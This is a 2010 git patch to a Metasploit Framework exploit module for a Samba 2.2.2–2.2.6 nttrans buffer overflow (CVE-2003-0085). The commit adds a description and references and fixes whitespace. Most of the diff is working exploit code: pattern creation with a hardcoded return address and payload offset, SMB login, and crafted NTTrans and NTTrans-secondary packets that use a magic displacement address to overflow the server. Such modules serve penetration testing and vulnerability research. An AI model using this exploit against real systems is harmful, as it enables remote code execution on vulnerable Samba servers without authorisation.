From 4f364e2830f1fdc8c33c996c40742383e848c3a5 Mon Sep 17 00:00:00 2001 From: Joshua Drake Date: Wed, 28 Apr 2010 03:54:24 +0000 Subject: [PATCH] add description, versions, fix whitespace git-svn-id: file:///home/svn/framework3/trunk@9167 4d416f70-5f16-0410-b530-b9f4589650da --- modules/exploits/multi/samba/nttrans.rb | 67 +++++++++++++------------ 1 file changed, 35 insertions(+), 32 deletions(-) diff --git a/modules/exploits/multi/samba/nttrans.rb b/modules/exploits/multi/samba/nttrans.rb index 17570685d4..2941a205d4 100644 --- a/modules/exploits/multi/samba/nttrans.rb +++ b/modules/exploits/multi/samba/nttrans.rb @@ -3,26 +3,30 @@ ## ## -# This file is part of the Metasploit Framework and may be subject to +# This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ ## - require 'msf/core' - class Metasploit3 < Msf::Exploit::Remote Rank = AverageRanking include Msf::Exploit::Remote::SMB def initialize(info = {}) - super(update_info(info, - 'Name' => 'Samba nttrans Overflow', + super(update_info(info, + 'Name' => 'Samba 2.2.2 - 2.2.6 nttrans Buffer Overflow', 'Description' => %q{ - + This module attempts to exploit a buffer overflow vulnerability present in + versions 2.2.2 through 2.2.6 of Samba. + + The Samba developers report this as: + "Bug in the length checking for encrypted password change requests from clients." + + The bug was discovered and reported by the Debian Samba Maintainers. }, 'Author' => [ 'hdm' ], 'License' => MSF_LICENSE, @@ -32,6 +36,7 @@ class Metasploit3 < Msf::Exploit::Remote [ 'CVE', '2003-0085' ], [ 'OSVDB', '6323' ], [ 'BID', '7106' ], + [ 'URL', 'http://www.samba.org/samba/history/samba-2.2.7a.html' ] ], 'Privileged' => true, 'Payload' => @@ -40,9 +45,9 @@ class Metasploit3 < Msf::Exploit::Remote 'BadChars' => "\x00", 'MinNops' => 512, }, - 'Targets' => + 'Targets' => [ - ["Samba 2.2.x Linux x86", + [ "Samba 2.2.x Linux x86", { 'Arch' => ARCH_X86, 'Platform' => 'linux', @@ -52,31 +57,29 @@ class Metasploit3 < Msf::Exploit::Remote ], 'DisclosureDate' => 'Apr 7 2003' )) - - register_options( - [ - Opt::RPORT(139) - ], self.class) - + + register_options( + [ + Opt::RPORT(139) + ], self.class) end def exploit - + # 0x081fc968 - + pattern = Rex::Text.pattern_create(12000) - + pattern[532, 4] = [0x81b847c].pack('V') pattern[836, payload.encoded.length] = payload.encoded - # 0x081b8138 - + # 0x081b8138 connect smb_login - targ_address = 0xfffbb7d0 - + targ_address = 0xfffbb7d0 + # # Send a NTTrans request with ParameterCountTotal set to the buffer length # @@ -90,16 +93,16 @@ class Metasploit3 < Msf::Exploit::Remote pkt = CONST::SMB_NTTRANS_PKT.make_struct self.simple.client.smb_defaults(pkt['Payload']['SMB']) - + base_offset = pkt.to_s.length + (setup_count * 2) - 4 param_offset = base_offset data_offset = param_offset + param.length - + pkt['Payload']['SMB'].v['Command'] = CONST::SMB_COM_NT_TRANSACT pkt['Payload']['SMB'].v['Flags1'] = 0x18 pkt['Payload']['SMB'].v['Flags2'] = 0x2001 pkt['Payload']['SMB'].v['WordCount'] = 19 + setup_count - + pkt['Payload'].v['ParamCountTotal'] =12000 pkt['Payload'].v['DataCountTotal'] = body.length pkt['Payload'].v['ParamCountMax'] = 1024 @@ -111,12 +114,12 @@ class Metasploit3 < Msf::Exploit::Remote pkt['Payload'].v['SetupCount'] = setup_count pkt['Payload'].v['SetupData'] = setup_data pkt['Payload'].v['Subcommand'] = subcommand - + pkt['Payload'].v['Payload'] = data - + self.simple.client.smb_send(pkt.to_s) ack = self.simple.client.smb_recv_parse(CONST::SMB_COM_NT_TRANSACT) - + # # Send a NTTrans secondary request with the magic displacement # @@ -127,16 +130,16 @@ class Metasploit3 < Msf::Exploit::Remote pkt = CONST::SMB_NTTRANS_SECONDARY_PKT.make_struct self.simple.client.smb_defaults(pkt['Payload']['SMB']) - + base_offset = pkt.to_s.length - 4 param_offset = base_offset data_offset = param_offset + param.length - + pkt['Payload']['SMB'].v['Command'] = CONST::SMB_COM_NT_TRANSACT_SECONDARY pkt['Payload']['SMB'].v['Flags1'] = 0x18 pkt['Payload']['SMB'].v['Flags2'] = 0x2001 pkt['Payload']['SMB'].v['WordCount'] = 18 - + pkt['Payload'].v['ParamCountTotal'] = param.length pkt['Payload'].v['DataCountTotal'] = body.length pkt['Payload'].v['ParamCount'] = param.length @@ -144,9 +147,9 @@ class Metasploit3 < Msf::Exploit::Remote pkt['Payload'].v['ParamDisplace'] = targ_address pkt['Payload'].v['DataCount'] = body.length pkt['Payload'].v['DataOffset'] = data_offset - + pkt['Payload'].v['Payload'] = data - + self.simple.client.smb_send(pkt.to_s) ack = self.simple.client.smb_recv_parse(CONST::SMB_COM_NT_TRANSACT_SECONDARY)